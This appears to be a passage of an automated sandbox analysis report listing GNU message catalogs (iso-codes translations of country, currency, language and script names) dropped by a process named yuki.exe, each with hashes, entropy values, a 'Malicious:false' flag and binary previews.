                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 2282 messages, Project-Id-Version: iso_3166-2 'Aakk\303\242r'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):99178
                                                                                                    Entropy (8bit):5.149426548988246
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:9SdbbVmhYemGDFEB2CNtjqhj0G+mLlQ0zXepBFtOvXPq:8d4hlmGDnbhjl+weHFsvXS
                                                                                                    MD5:3F3BF54250DD2954D7520ADE6FC21817
                                                                                                    SHA1:753E5F03ACA6DE996543CF25799290D22594A209
                                                                                                    SHA-256:2352BD27125656B76AA97662C3CF08370D1993E7ABF546DF213B5C82282DE725
                                                                                                    SHA-512:6D89F72B315F9F827965A2F48A9E95A285C04BAE23E7B4C35C2BA5B0D33C9F0960FBC487B8A2872B30FF69495E260584122DE4AF53124826070685F031D852F9
                                                                                                    Malicious:false
                                                                                                    Preview:................lG..............`.......a.......i.......p.......~...........................................................................................................................................+.......2.......8.......B.......N.......^.......i.......u............................................................................................................&.......0.......:.......I.......W.......g.......s.......~.......................................................................................................................%.......2.......C.......J.......S.......b.......i.......t.......................................................................................................#......./.......9.......@.......N.......e.......{.......................................................................................................................................#.......).......3.......A.......R.......a.......o.......w.......~.......................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 'Territ\303\262riu Brit\303\240nnicu Ant\303\240rticu'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2948
                                                                                                    Entropy (8bit):5.221474931900516
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf3Qfh+CRRgBF+vGqIfdvqN5CoU/5g7CbY5jy0SDGK0cBrul/:rLvQ7QBF+yaCokg2wZ+GrY6/
                                                                                                    MD5:99D89B625D5A2CFD70990D552EA29DAB
                                                                                                    SHA1:D1DB3725DDFB8903E10FBA7E16F1089250CFDD3A
                                                                                                    SHA-256:E3D27E29529FEAE3B51A43755C395ADA17CD567F06FD6BDF9C4FB7C8B486F5BD
                                                                                                    SHA-512:C485196BD576B84A51920BF8EE04748E46BC8306D3B35866C7795C007E1BB8892D808A4E5689B70528FD64743A1C37E56B814A1D5191842E2692868D00616168
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+.......................".......0.......-...........D...6...`.........................................../...................N.......g.......w...........................G...................................5...5...J...8...............&...............-.......4...7.......l........... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 180 messages, Project-Id-Version: iso_4217 'Unidade de contu de sa ADB'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9999
                                                                                                    Entropy (8bit):4.9654941015875345
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:fqFBDwKbVYR6VRyK0G/2LCntxKLhyyUA6bdzmNRyo:SXjbc6TL0G/Uo/3yfedzmWo
                                                                                                    MD5:8D44539A0009E94D96B743B4E1CFD3CC
                                                                                                    SHA1:89B39F508248D23D6732B4B017F8676795E35F3F
                                                                                                    SHA-256:9FD772F8BE312CF314A0AE131C28B8D368C80707D489C8B102A85CA29D486532
                                                                                                    SHA-512:7281CA225DA2F10516E4420BF7F5286884A2D0ECD68AC2C3B4C598F2AE05BDA644A3E6E034B9E2D6E2880F7EA80769B0B408F354E8310B6834724B52543FA15F
                                                                                                    Malicious:false
                                                                                                    Preview:........................\....... .......!.......5.......=.......L.......[.......i.......w...........................................................................................1...!...3...S...9.......7...................................$.......2.......B.......Q.......[.......m.......}...........0...................................................................9.......F.......M.......Z.......`.......o.......u...............................................................................................................%.......-.......;.......I.......Z.......b.......p.......}.......................................................................................................................................(.......5.......?.......D.......T.......b.......t...........!...................................................................................1.......D.......V.......i.......r.......................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 480 messages, Project-Id-Version: iso_639-3 'Abau'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):19985
                                                                                                    Entropy (8bit):4.8184321738674285
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:J+5llNi3tCcGnO7cBkrlUbQ5TgH/5l6sTO9f4g+UFMBjMUb5fgGL9Eiva91dTsK:Al7cGK6ITQz6T9/2b+GJkdTsK
                                                                                                    MD5:27F7C46285EDD138C0014566B1580094
                                                                                                    SHA1:E7F40B04522C8B4343D4B777D78DCD6996B4F0AB
                                                                                                    SHA-256:839CA810B9B8839951119F955BB743E3982BFA544126733BFD512131BFE37408
                                                                                                    SHA-512:67A85D734661CBED29894FDD8C8EFF527D13831FE5EF345904932E3D74D676B45D4EDF0FC33EDDC9EC50DD2BA36FE148F9324BE20750BF872697E988D055BF0B
                                                                                                    Malicious:false
                                                                                                    Preview:................................ (......!(......&(......0(......=(......F(......L(......T(......[(......a(......f(......o(......y(......~(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......).......).......).......).......)......8)......A)......I)......W)......^)......s)......w).......).......).......).......).......).......).......).......).......).......).......).......).......).......*.......*.......*.......*...... *......'*......-*......6*......=*......H*......P*......Y*......_*......g*......s*......{*.......*.......*.......*.......*.......*.......*.......*.......*.......*.......*.......*.......*.......*.......+.......+.......+.......+......$+......-+......;+......C+......I+......Q+......`+......h+......q+......y+.......+.......+.......+.......+.......+.......+.......+.......+.......+.......+.......+.......+.......+.......+.......+.......,.......,.......,.......,.......,......!,......?,......E,......N,......^,......c,......v,......},.......,......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 116 messages, Project-Id-Version: iso_639-5 'Limbas afroasi\303\240ticas'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7679
                                                                                                    Entropy (8bit):4.833270107618133
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:4SDx0TDuwQFSE0BfNca7sPX7msg+gKsOcyguGqq:XWJE0BfNcauCsg+gKfcyFGqq
                                                                                                    MD5:9D1F8411AF9FBA5D48A153F79892A310
                                                                                                    SHA1:D650F267A00E1945C03F312B3F198E1651F15A65
                                                                                                    SHA-256:C59C0D9ED193BDDB8C7075F02726FF8FFD1B4264043472FA8FA57D464CF90B4A
                                                                                                    SHA-512:94DE7F984C34766FC6FB520320AC1EB23386AD555D79661244054B8840C7402AA130E805B415DC59BC8866D2673E6EF84E1D0EF633CF9C79EE92FB392B1A94E7
                                                                                                    Malicious:false
                                                                                                    Preview:........t...............\............................................... .......5.......F.......W.......h.......{...............................................................&.......9.......I.......Y.......i.......y...................................!.......#...................2.......C.......T.......g.......x...$.......#.......%...........................".......:...#...P.......t.......................................................................*.......8.......H.......`.......w...............................................................................7.......G.......X.......h.......|...............................................................1.......J.......[.......l...............................................................................'.......9.......P.......a.......r...............................................................(.......9.......H.......Y.......j...........................#...........................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 76 messages, Project-Id-Version: iso_3166-1 '\330\247\331\201\330\272\330\247\331\206\330\263\330\252\330\247\331\206'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3785
                                                                                                    Entropy (8bit):5.035660833922863
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:mpziiuDqs8/aWkiaU9uEVG7ynpwyPzkIrDQm+aCYbUY2:mpkDqwWkiaU9fVGGXPobaFx2
                                                                                                    MD5:D24A94E14B3F76FBC1134EA342F61696
                                                                                                    SHA1:327AC4D10F18D33E44881DB0CE51A444B6A119DB
                                                                                                    SHA-256:5776D8221B63B0171C50A4796F743A2B371E0BE57D6414854C90D7A80101D407
                                                                                                    SHA-512:1298F8188C24909960594A2996EA69BAC51969523A256EC955C6269C19784110BFBA1CA774F264283A403D889BD51BC7D2AE773A10AE11548732664CBB6A092E
                                                                                                    Malicious:false
                                                                                                    Preview:........L.......|...e...........p.......q.......}.......................................................................................................................................................................#.......+.......2.......8.......@.......F.......M.......T.......Z.......`.......j.......o.......v.......|.......................................................................................................................................................#.......).......6.......>.......H.......P.......].......c.......m.......t.......................................................................................................................................................).......4.......E.......R.......[.......h.......u.......................................................................................................................".......-.......8.......A.......J.......].......f.......................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 3 messages, Project-Id-Version: iso_15924 '\340\266\205\340\266\273\340\267\217\340\266\266\340\267\222'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):600
                                                                                                    Entropy (8bit):5.427280401238537
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:iCAFU7BxCfVt02UkM/vETlG/43H3vXmBQWiOWSD:/AFUVCVt0UgveG/yXmGSD
                                                                                                    MD5:C448AA7D09C298DFA6615ABC7E6AA606
                                                                                                    SHA1:46A3629290B977FE7A9B19C47612F47901389E65
                                                                                                    SHA-256:AFC38C018A0352464857CB8B42AB25DEFE8E388ABFA978237AA92501A18F8159
                                                                                                    SHA-512:525BEF932BDADEC26C6582846F69F875E0237DEE380687634DC11983D83EBB1F6F75925CAF4ADB5778639964C1F5F895D1D227F42B72E9E74845A02F8E7E16DF
                                                                                                    Malicious:false
                                                                                                    Preview:................4.......L.......`.......a.......h.......o.......5.......E........................Arabic.Telugu.Project-Id-Version: iso_15924.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2021-02-28 22:50+0000.Last-Translator: HelaBasa <R45XvezA@protonmail.ch>.Language-Team: Sinhala <https://hosted.weblate.org/projects/iso-codes/iso-15924/si/>.Language: si.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n > 1;.X-Generator: Weblate 4.5...............
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 404 messages, Project-Id-Version: iso_3166-1 '\340\266\207\340\267\206\340\267\212\340\266\234\340\266\261\340\267\222\340\267\203\340\267\212\340\266\255\340\267\217\340\266\261\340\266\272'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):31931
                                                                                                    Entropy (8bit):5.06764523057811
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:3nOHasRgW+msOP4XJOAEdBSZzTzlNxIzf/STMn9Yg1RsNgy+F3Xa/0vI1CF:3nOHjmW/+T22IRha/0/F
                                                                                                    MD5:57883CEA7D734711A969E6514E3561FB
                                                                                                    SHA1:011887F93A9D3EB19F0229AE7B95A0246898C608
                                                                                                    SHA-256:315CAD05C8992CF88583503C85D663AD4520C9AB10866EF004D7B8E108398BE9
                                                                                                    SHA-512:B785F9BA7D7328F3579785D63921C1FF3375DD0749CC76519C68AB89BAAA8BE304AD5F855CF730052393FA8BF56A444848FEF4A241562699E9BDD1BDD37C1AED
                                                                                                    Malicious:false
                                                                                                    Preview:........................\........!.......!.......!.......!.......!.......!......."......."......."......."......3"......J"......T"......g"......o"......u".......".......".......".......".......".......".......".......".......".......".......".......".. ....".......#.......#.. ...+#......L#......c#......l#......z#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......($......-$......3$......9$......J$......b$......k$.......$..,....$.......$.......$..%....$.......%.......%.......%......!%......&%....../%......6%......E%..%...T%..,...z%.."....%..*....%.......%.......%.......&.......&......"&......>&......F&......L&......X&......j&......r&......z&.......&.......&..'....&..$....&.......&.......'......2'......Q'......o'......t'......|'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(.......(......'(.......(......8(......@(......K(......P(......Z(......c(......j(......x(.......(.......(..!....(.......(.......(......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 '\340\266\266\340\267\212\342\200\215\340\266\273\340\267\222\340\266\255\340\267\217\340\266\261\340\267\212\342\200\215\340\266\272 \340\266\207\340\266\261\340\267\212\340\266\247\340\267\217\340\266\232\340\267\212\340\266\247\340\267\222\340\266\232\340\267\212 \340\266\264\340\267\212\342\200\215\340\266\273\340\266\257\340\267\232\340\267\201'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3816
                                                                                                    Entropy (8bit):5.3027237746425415
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:qDNUVyBoOHZG+XDDD4GciVcf4Blh3UCRZim:qDNqO5LXc9MceRUcB
                                                                                                    MD5:780A068C9ED866A0E47DA0CBE59BDED0
                                                                                                    SHA1:4C23A9E979C9C888B79AD23A5B83A0BBBFA549F0
                                                                                                    SHA-256:CECBEB95F79E83F19756E488D328598F79D8C029E7AAC6017FFE46A64CFA45CE
                                                                                                    SHA-512:0C80841F4AE6677ABD63F801A69694D874F3D424961E7521D12BB2413EAB8C545ADFDA79D7BC8DC648EDD2F3434C34586BD33AE73D7B64B449D82DFC8D3CA70B
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...................Y...L...8.......g.......B...G...................5.......+...S...A.......9.......a.......V...]...<.......+.......".......:...@.......{...(.......V......./...*...G...Z...........+.......@.......m...(...,.......\........... .......:................................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 29 messages, Project-Id-Version: iso_15924 'arabsk\303\251'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1782
                                                                                                    Entropy (8bit):5.041666227178208
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rchGqBrcpOSCgJrTYUXlUvKySnQv8VuyAk:CGarcp9kQlIKivpyAk
                                                                                                    MD5:2C8BC8FA8740C7080ABE91C241433CAE
                                                                                                    SHA1:DDD1F8EFE06732B5BEB598319BE4B2E8F2E242B7
                                                                                                    SHA-256:49F837C102D6EE4DF7EE899648FD6C80E93F52D6A832DA1703706D5405A61A92
                                                                                                    SHA-512:E7D49043E2CF8D9DC7279BB9F29514475426F518950F2610920C5CE2179752662EED91C1EE5E451C606605BD126E8E56C05F2F7460E494A976FF030EB3CF4C56
                                                                                                    Malicious:false
                                                                                                    Preview:....................)...................................................................................................................................5.......>.......m.......v...................................................................................]...........Q.......Z.......d.......m.......x.................................................................................../...........@...#...I.......m.......w........................................................................................................................................................................................................................................Arabic.Armenian.Bopomofo.Brahmi.Braille.Cherokee.Cyrillic.Egyptian demotic.Egyptian hieratic.Egyptian hieroglyphs.Glagolitic.Greek.Hangul (Hang.l, Hangeul).Hebrew.Hiragana.Japanese (alias for Han + Hiragana + Katakana).Katakana.Korean (alias for Hangul + Han).Latin.Linear A.Linear B.Mayan hieroglyphs.Phoenician.Rongorongo.Thaana.Thai.Tibeta
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 'Afganistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):24190
                                                                                                    Entropy (8bit):5.150734672640683
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:F9k3DKSosMlF5tbPAvxooxC946nbjz5wsWP48WAINiZGXaipymvALoucXPDC5l0h:0ovlFzbPAZoF948fmsWP48WAI1amfxDx
                                                                                                    MD5:06EA4C1C2DBC22A3D66503A68C92AB7B
                                                                                                    SHA1:D14D3982E77F14279B48AB069652B60B9C181355
                                                                                                    SHA-256:4F8E78DB902BD88D066FB1D43A487787AA679AD566BB409294B8A4CF2FFEA18B
                                                                                                    SHA-512:30AB9A09EA4A01561B89BACF8B2FFFFD7FB7ACDA8E6AC7FF70DE2855A49EDC09D6904615458AFCF2F20679C1C1400D47BFD78F39A5102511B0D4621E9663330A
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 269 messages, Project-Id-Version: iso_3166-2 'Aargau'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):13180
                                                                                                    Entropy (8bit):5.065596266718157
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:odZ3lpMXaR/Ji3TvCJ+Vuj+ICJsy7IQvpRGDTJ/b9Flth4yKIWvC2X7vUSv+F3:odZ1pMX+/2TCJHaIqNQTJT7luq2Lw
                                                                                                    MD5:B47D38B4A67B287719AF0EEF77FD5599
                                                                                                    SHA1:9F9CBF36FA24036EBD4382C94017D16E4479EDDC
                                                                                                    SHA-256:1DAEA821F88DD47B716414847A755FDA30A1F845931E3BC3FC870D2D8137FF34
                                                                                                    SHA-512:AFEF7AE513D6F3A9B76719DC9E58C8EE224C2F05510F8C7302E3718A210AE68E4E048DCB571D6FB41F663B33146BE64C201EC4E8FCD00C6A1CEE5810B9AF21E4
                                                                                                    Malicious:false
                                                                                                    Preview:....................g...........................................................................................................................................................6.......>.......G.......M.......[.......s.......y................................................................................... ...........................-.......9.......@.......S.......n.......y........................................................................................... ...*.......K.......T.......`.......l.......u...................................................!...........................................................................&...............6.......=.......C.......O.......Z......._.......i.......o.......................................................................................................................................&.......+.......A.......H.......\.......m.......r.......y...#...............................................................................#...........
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 'Britsk\303\251 antarktick\303\251 \303\272zemie'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2887
                                                                                                    Entropy (8bit):5.329050560123615
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf3QAQAt7+vGqIfdvqN5CoUWxAQhYr7/Na7W5RGRz+zO3qwTKha5y54TIMl:rLvQGZ+yaCoyQ2H/naRzkO3qwxcuIk
                                                                                                    MD5:AA45E0A24C853A8050247B3DEA873BEC
                                                                                                    SHA1:537E0489E0B94E70D7DE567DFA607085D15BF3B8
                                                                                                    SHA-256:4259361C6EB4B2C8170D8114D242B273C2E061CDB0C1A414748CCC4F75CA3EDD
                                                                                                    SHA-512:5BAA125E08A6BF529F0B039F08E628982788E8C6A21F1D1B56B56293F0EDC4B802190A87D7E258C365AFA2A948508E9168CF4C14944138F0E63AA9ED4F6CC649
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+...............................'...........$.......S...:...n...................................%.......*....... ...A.......b...........................................,...........................0.......7...%...@...2...f...........#...............(.......1...........4........... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 85 messages, Project-Id-Version: iso_4217 'afg\303\241n (nov\303\275)'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4911
                                                                                                    Entropy (8bit):4.979850146709576
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:TiImH+f8z9U3r+M4oEWrtmN81fHFMyZTkZ4ZR+0Qpqk+zwmcNnZkczBl:ae0z9U36rCrgNH4AXxzX
                                                                                                    MD5:636C38B0252129521C388FE8639FD5F4
                                                                                                    SHA1:91BA91D25655E8128E0CBF5770ED229C0A4F209F
                                                                                                    SHA-256:FDF9B17026856623BFB0F187C8FDD0429721F09F907EC424EA316731B13259F3
                                                                                                    SHA-512:2E64DFFE60F5DE1100A80F55383E052A8C3A4E6C8B67A4B1ECF469ABF3C933085FFDF8CBA0B13020998905CB33DC9CFE067C9ABA64EC61290D2278E977F9CE1B
                                                                                                    Malicious:false
                                                                                                    Preview:........U...........q...l.......0.......1.......9.......H.......W.......e.......w...............................................................................................'.......=.......J.......Y.......k.......v...............................................................................................$.......5.......C.......P.......].......i.......y...............................................................................................%.......4.......F.......Y.......j.......z...............................................................................................).......@.......P.......`.......o.......}...........................................................................\...........p.......................................................................................).......9.......K.......b.......s............................................................................... .......3.......C.......X.......g.......l.......................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 256 messages, Project-Id-Version: iso_639-3 'a\304\215oli'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11443
                                                                                                    Entropy (8bit):4.913821715747651
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:KAa2nMGTEg/iOVTkiLMWfZT9PFotftLzO85X5c1IWwwNyEyfunRAjP:KAfnMGElOVTbXfbFoBBR0qpPWRA7
                                                                                                    MD5:B79AEB6745C5FCC8041CF5B54F912208
                                                                                                    SHA1:CA684FC4306BA5845A07A690BD521F90EFD3318C
                                                                                                    SHA-256:EDF6F553BCA534BC344703BED99B20E721CB53E782924692ACA2E563B262292E
                                                                                                    SHA-512:A126C27939A5F6EEC5E70E52725607358E2C51BB1460B03BBFE5655B473AD9B805463EC0D3C871DEC7E5B651361188B22E2EB7243987B445F70BDF0F130332BC
                                                                                                    Malicious:false
                                                                                                    Preview:....................[...................................................................................................................................................................................'.......0.......6.......>.......C.......J.......T.......\.......b.......j.......r.......{...............................................................................................................................................................:.......@.......I.......N.......a.......h.......p...............................................................................................................(...............1.......7.......<...#...C.......g...............................................................................................................................................).......-.......2.......8...:...C.......~.......................................................................................................................!.......(.......1.......=.......B.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 108 messages, Project-Id-Version: iso_15924 'arabska pisava'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6350
                                                                                                    Entropy (8bit):4.884466868439717
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:XF3JF456CaIZM4KnSa54+dR+xz9ZCRDRvPZt/oaaR4mpk5mTM6cNdOds:XDFqiF4Fa54oA1C/f/oXwNdh
                                                                                                    MD5:0F609270C779A7FF56DD644837F7BDDA
                                                                                                    SHA1:83BD4612BD64B126A1732B794E3DA57F799524E1
                                                                                                    SHA-256:BF5D928C78119BC683F9FBC6CF33B5B7F972D931AAFDC551CE56DA04EA9D0189
                                                                                                    SHA-512:20F69C4FE8F9499CED2A94227D0A637164DDD8FAD956AA05C80173009B6937E3D7C78B4030C3FCC038C6062E32790D049D9982DAB88C574A654D3F3D4C88E44A
                                                                                                    Malicious:false
                                                                                                    Preview:........l.......|...............0.......1.......8.......A.......I.......R.......X.......`.......l.......y.......................................................................................................'...............I.......Q...&...Z...............................................................................................&......./.......I.......b.......|.......................................................................................!.......,.......2.......R.......V.......\.......t...............................................................................................................=...(...G.......p..........."....................................................... ...........%.......0.......6.......@.......G.......V.......^.......h.......u.......}...............................................................................................)...%...2.......X...............................#.......3.......C.......T.......m.......~...............................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 410 messages, Project-Id-Version: iso_3166-1 'Afganistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):22611
                                                                                                    Entropy (8bit):5.034485905678592
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:te7hGfQDzPGKQv2Wma9Cu6gIoG8je5wsOP4XLAE1irKWxVfKuNyrEyfclmccK2:prKQuWma9CCFn6msOP4XLAEM39kYmK2
                                                                                                    MD5:228DF4CABC03F70A547B68BE700C721A
                                                                                                    SHA1:E64AC74D30C1A0F399CBE176130B4281957D9D43
                                                                                                    SHA-256:128E14F0ACB34A5E588DEA994F0A5C5D15AD3F03A7E5EE38CD467ACB6B6C5176
                                                                                                    SHA-512:63CA8488AE9968A43B5405C8D35006CEC497590206BD1839896824F383C3AF3B9BEDBF8ED0E62096A7BD45BB832CAE4196E77E3D52A8F033E46DF56ED86CB3A7
                                                                                                    Malicious:false
                                                                                                    Preview:....................#...........H"......I"......U"......]"......e"......t"......|".......".......".......".......".......".......".......".......".......".......".......".......#.......#.......#......%#.......#......6#......>#......E#......K#......S#.. ...Z#......{#.......#.. ....#.......#.......#.......#.......#.......#.......$....../$......A$......J$......W$......_$......h$......q$......x$.......$.......$.......$.......$.......$.......$.......$.......$.......$..,....%......E%......M%..%...S%......y%.......%.......%.......%.......%.......%.......%.......%..%....%..,....%.."....&..*...B&......m&......u&......~&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......'..'...%'..$...M'......r'.......'.......'.......'.......'.......(.......(.......(.......(......%(......6(......F(......b(......h(......z(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......).......).......)..!...5)......W)......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1861 messages, Project-Id-Version: iso_3166-2 'Aargau'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):79342
                                                                                                    Entropy (8bit):5.057591748807447
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:APDv2Zma6SWv2gxJuwBGQ8xt3HRQw1OD6SPpKVh0MLk:OjumlJBGQ8xtXRQw1OD6sp+hjLk
                                                                                                    MD5:B91522BDBA81F0A0FFE17B4A0D6F2F10
                                                                                                    SHA1:88499B146E2C5BCF103B1D1B57CE0060120CB03F
                                                                                                    SHA-256:A89CDDB6D549CBFDBB9DAD9632532722C9CDA605418270F53D4B90D310779716
                                                                                                    SHA-512:1D2E28B5169C4B011A48DD380A7A3E17782D3872842CCE0FA6E9511DDFE4381E3BEDD35D93F98D05B17385BD3E929973C5FA4EFDA71CD270094854DED3160BA0
                                                                                                    Malicious:false
                                                                                                    Preview:........E.......D:......lt..............................................................................................................................................................."...............6.......>.......G.......N.......S.......\.......d.......p.......x.................................................................................................................).......:.......@.......G.......S.......[.......e.......q.......{........................................................................................................................................,.......4.......<.......E.......M.......U.......Z.......`.......n.......v.......|...........................................................................................................................%.......-.......@.......H.......N.......Z.......k.......q.......v.......~.................................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 'Britansko antarkti\304\215no ozemlje'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2596
                                                                                                    Entropy (8bit):5.1828873926784444
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADHvXvGqIfdvqNuoUX/RI7ejLAr5pe2AVwygcDZYnjpp7M:qDH/yBowtq52gcDsC
                                                                                                    MD5:C24D71BD2F279E80622752696D025030
                                                                                                    SHA1:E710428328CCC4D7012FF5559DA44F75AAAAD412
                                                                                                    SHA-256:85EFBD7123EBF316A7445E8E95A4A94529C27439C5C906EFB7A21C71EBE5B752
                                                                                                    SHA-512:73AE0830D0BFE7E69C0C1F3CAE5023CF651DFB6D5A88EFF1D6F77B530469A886D09F4B7E3351BC8471AC1316913C6D742EB2F1273B75165293BEDEF13BC0E47A
                                                                                                    Malicious:false
